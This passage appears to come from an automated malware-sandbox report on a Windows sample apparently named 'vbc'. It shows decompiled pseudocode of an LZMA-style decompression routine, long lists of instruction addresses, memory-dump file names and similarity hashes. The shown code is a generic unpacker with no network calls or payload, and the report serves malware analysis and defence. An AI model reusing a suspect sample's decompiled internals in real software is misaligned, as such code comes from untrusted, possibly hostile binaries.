													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                          0x00000000
                          0x004062eb
                          0x004062eb
                          0x004062ef
                          0x00406310
                          0x00406317
                          0x0040631d
                          0x00406323
                          0x00406335
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x004062f1
                          0x004062f7
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x004062ef

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                          • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406409 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
